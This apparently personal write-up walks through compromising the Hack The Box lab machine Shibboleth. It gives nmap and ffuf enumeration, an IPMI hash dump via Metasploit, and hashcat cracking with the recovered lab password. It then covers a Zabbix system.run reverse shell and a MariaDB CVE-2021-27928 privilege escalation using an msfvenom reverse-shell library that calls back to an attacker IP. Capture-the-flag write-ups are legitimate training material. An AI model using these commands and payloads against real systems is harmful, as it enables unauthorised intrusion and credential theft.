Shibboleth — Hackthebox Walkthrough
This was a cool box that I enjoyed playing. Learned some new things as well. I liked this box very much because every step of this box felt new. Thanks to knightmare & mrb3n.
Foothold/User
My initial nmap scan revealed only one port.
nmap -p- -sC -sV --min-rate=400 --min-parallelism=512 -vv shibboleth.htb
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.41
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: FlexStart Bootstrap Template - Index
Looking at port 80, was a static webpage.
I tired, looking for interesting things within this, but that was a bust. So I moved on to do some subdomain enumeration and I found 2 subdomains.
ffuf -u http://shibboleth.htb -w /usr/share/wordlists/dirb/big.txt -H "Host: FUZZ.nunchucks.htb" -fw 18
I added these to my /etc/hosts file and look a visit to them. Both of them pointed me to the same webpage and it was Zabbix.
Since I didn’t have any credentials to login with, I had no idea what to do.I tried doing SQLi too, but that took me nowhere. So as always, I took a step back back and went to see what I missed.
I noticed, in the nmap scan, I was only scanning for TCP ports not UDP. So I ran a quick UDP port scan.
sudo nmap -sU -vv 10.10.11.124
PORT STATE SERVICE REASON
623/udp open asf-rmcp udp-response ttl 63
And right-off the bat, I saw UDP port 623 was open. With some research, I got to know that this is running IPMI. Typically this is a, type of embedded computer program used to provide out-of-band monitoring for desktops and servers.So I googled about this and I found a hacktricks article about attacking this service.
I followed this article and used a Metasploit module and exploited the following vulnerability to dump the hashes of the users.
sudo msfdb run
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOST shibboleth.htb
run
And I was able to get the hash of the Administrator user.
Then I cracked this hash with hashcat.
hashcat --force -m 7300 hash.txt /usr/share/wordlists/rockyout.txt
And I was able to retrieve the Administrator’s password as ilovepumkinpie1.
5cefdd2a82120000f2897c817ad09799d223bc451ae090db02b8fdf698384558f2ffa5b8e301c86ba123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:20ee8cfe6ebf059438a3e7efa97c7af3c574abfb:ilovepumkinpie1
With these credentials, I was able to login to the Zabbix application at http://monitoring.shibboleth.htb/
Username: Administrator
Password: ilovepumkinpie1
With this, I spent almost like 2 hours enumerating this application. And since this was being my first time working with zabbix, I had no idea what to look for.
So I went looking for the zabbix documentation to understand what I can do. And reading through this, I found a way to execute commands by adding a item to a host configuration.
According to the documentation, I browsed to Configuration → Host → Items. Then I created a new item with the Key set to system.run[]. I used my typical payload to get a shell. Also, I specified “nowait” as the second argument to this since it was mentioned in the Docs.
This is all I had to change. Then I added this item and waited.
After couple of seconds, I got a shell as zabbix user. This user was just a service user. I saw there was a system user called ipmi-svc. I was able to login as ipmi-svc with the previous password retrieved from the IPMI service.
Username: ipmi-svc
Password: ilovepumkinpie1
Root
Looking around the file system, I found the config file of the zabbix server at /etc/zabbix/zabbix_server.conf. And I found some database credentials from that file.
cat /etc/zabbix/zabbix_server.conf|grep -v "#"
Username: zabbix
Password: bloooarskybluh
Looking at the open ports, I saw MySQL was running in port 3306.
ss -tlnp
So, I logged in with the above credentials and enumerated the databases. I found some password hashes in the zabbix database and tried to crack them. But it took forever and didn’t give me anything.
Again, I took a step back and looked to see what I had missed. And one thing among them was that the MariaDB version was a little old.
Looking for any exploits for this version, I found that there is a CVE for this which was CVE-2021–27928. According to the CVE, the vulnerability is:
“An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying wsrep_provider and wsrep_notify_cmd” : REFER
And I found a GitHub repo that had the steps I needed to exploit this vulnerability.
Following the mentioned steps, first, I made a .so file with msfvenom.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.15.21 LPORT=443 -f elf-so -o test.so
Then I started a listener on port 443 and transferred the file to the box. Then, as mentioned in the POC, I executed the following command.
mysql -u zabbix -p
SET GLOBAL wsrep_provider="/tmp/test.so";
And I got a shell back as root.
Rooted!!!
“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”
Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/
Happy Hacking !!! 😄